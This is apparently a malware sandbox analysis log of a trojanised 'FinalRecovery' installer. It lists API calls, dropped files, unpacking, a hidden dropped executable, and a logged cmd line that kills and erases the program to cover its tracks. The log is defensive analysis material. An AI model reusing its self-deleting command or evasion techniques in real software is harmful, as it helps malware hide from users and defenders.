              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00454800 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004083E4
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00466728
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0047EB9C
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0046F304
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0043D388
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004440A8
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0045E468
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0045A510
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004447A0
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004687A0
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00434900
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00430B40
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00444BAC
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00484C90
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00450D1C
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00443B00
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00485BC4
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00433BFC
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0048BECC
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0042FFB4
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00404490
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_004096E8
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_004057C7
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00406800
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00406AA0
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00404D40
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00405F40
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00402F20
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00415053
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00415285
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00422329
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00419490
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00409670
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_004267D0
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00404840
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_004109D0
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0042AB1A
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00421C08
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0042AC3A
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00428CB9
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00447D2D
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00404F20
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_1000E111
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_1000FAC0
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: String function: 10003100 appears 34 times
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: String function: 0040F960 appears 54 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: String function: 00405964 appears 108 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: String function: 00403400 appears 60 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: String function: 00406AA4 appears 39 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: String function: 0044540C appears 45 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: String function: 004456DC appears 59 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: String function: 004526A4 appears 91 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: String function: 00433B14 appears 32 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: String function: 00456D64 appears 70 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: String function: 004078D4 appears 43 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: String function: 00456B58 appears 93 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: String function: 00403494 appears 83 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: String function: 00408BEC appears 45 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: String function: 00403684 appears 218 times
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0042F178 NtdllDefWindowProc_A,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00423B6C NtdllDefWindowProc_A,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004563D8 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004125C0 NtdllDefWindowProc_A,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004771E0 NtdllDefWindowProc_A,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0042E780: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,
              Source: file.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
              Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
              Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: file.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
              Source: is-H9OSH.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: is-H9OSH.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
              Source: is-H9OSH.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
              Source: is-H9OSH.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: is-H9OSH.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
              Source: file.exe, 00000000.00000003.241822498.0000000002138000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
              Source: file.exe, 00000000.00000003.241621215.0000000002320000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy) 233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730
              Source: finalrecovery.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_PRELOAD, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp" /SL5="$4025C,1578849,54272,C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpProcess created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeProcess created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exe
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp" /SL5="$4025C,1578849,54272,C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpProcess created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeProcess created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exe
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00454800 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
              Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;finalrecovery.exe&quot;)
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeFile created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmpJump to behavior
              Source: classification engineClassification label: mal92.troj.evad.winEXE@12/24@0/4
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00401B40 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00455028 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_01
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409BC4 FindResourceA,SizeofResource,LoadResource,LockResource,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpFile created: C:\Program Files (x86)\FgasoftFRJump to behavior
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCommand line argument: `a}{
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCommand line argument: MFE.
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpWindow found: window name: TMainForm
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: file.exeStatic file information: File size 1825141 > 1048576

              Data Obfuscation

              barindex
              Detected unpacking (overwrites its own PE header)
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeUnpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack
              Detected unpacking (changes PE section rights)
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeUnpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.fga20:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
              Obfuscated command line found
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp" /SL5="$4025C,1578849,54272,C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp" /SL5="$4025C,1578849,54272,C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406590 push 004065CDh; ret
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004080DC push ecx; mov dword ptr [esp], eax
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004040B5 push eax; ret
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404185 push 00404391h; ret
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404206 push 00404391h; ret
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C218 push eax; ret
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004042E8 push 00404391h; ret
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404283 push 00404391h; ret
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408F10 push 00408F43h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0040992C push 00409969h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0040A027 push ds; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00476228 push ecx; mov dword ptr [esp], edx
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004062CC push ecx; mov dword ptr [esp], eax
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0045866C push 004586B0h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004106B8 push ecx; mov dword ptr [esp], edx
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0040A77C push C00040C3h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00412910 push 00412973h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00442A78 push ecx; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00450B58 push 00450B8Bh; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00450D1C push ecx; mov dword ptr [esp], eax
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00456E00 push 00456E38h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00492EC8 push ecx; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0040D010 push ecx; mov dword ptr [esp], edx
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0045F0C0 push ecx; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0040546D push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0040F570 push ecx; mov dword ptr [esp], edx
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00483538 push ecx; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0040553D push 00405749h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004055BE push 00405749h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0040563B push 00405749h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004056A0 push 00405749h; ret
              Source: finalrecovery.exe.1.drStatic PE information: section name: .fga20
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0044AC90 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
              Source: initial sampleStatic PE information: section name: .text entropy: 7.3303142565000785
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpFile created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_shfoldr.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpFile created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-J1RPT.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_RegDLL.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpFile created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_iscrypt.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpFile created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-H9OSH.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpFile created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpJump to dropped file
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeFile created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00423BF4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00423BF4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0042417C IsIconic,SetActiveWindow,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004241C4 IsIconic,SetActiveWindow,SetFocus,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0041836C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00422844 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00417580 IsIconic,GetCapture,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00481878 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00417CB6 IsIconic,SetWindowPos,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00417CB8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0044AC90 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
              Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodes
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_shfoldr.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpDropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-J1RPT.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_RegDLL.tmpJump to dropped file
